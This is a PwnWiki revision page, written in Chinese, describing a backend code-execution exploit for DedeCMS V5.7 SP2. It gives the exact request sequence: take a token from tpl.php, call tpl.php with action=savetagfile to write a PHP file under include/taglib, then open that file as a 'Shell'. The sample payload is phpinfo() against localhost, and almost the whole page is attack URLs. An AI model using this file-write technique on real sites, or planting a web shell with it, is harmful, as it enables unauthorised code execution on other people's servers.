Difference between revisions of "DedeCMS V5.7 SP2 後台代碼執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞利用== </translate> <translate> 首先獲取token: <code>domain + /dede/tpl.php?action=upload</code> 通過查看頁面源碼即可...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞利用== | + | ==漏洞利用== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
首先獲取token: <code>domain + /dede/tpl.php?action=upload</code> | 首先獲取token: <code>domain + /dede/tpl.php?action=upload</code> | ||
| + | <!--T:3--> | ||
通過查看頁面源碼即可獲得 token | 通過查看頁面源碼即可獲得 token | ||
</translate> | </translate> | ||
| Line 17: | Line 19: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
然後訪問: | 然後訪問: | ||
</translate> | </translate> | ||
Latest revision as of 09:59, 10 April 2021
漏洞利用
首先獲取token: domain + /dede/tpl.php?action=upload
通過查看頁面源碼即可獲得 token
http://127.0.0.1/uploads/dede/tpl.php?action=upload
然後訪問:
http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>
Shell
http://127.0.0.1/include/taglib/secnote.lib.php
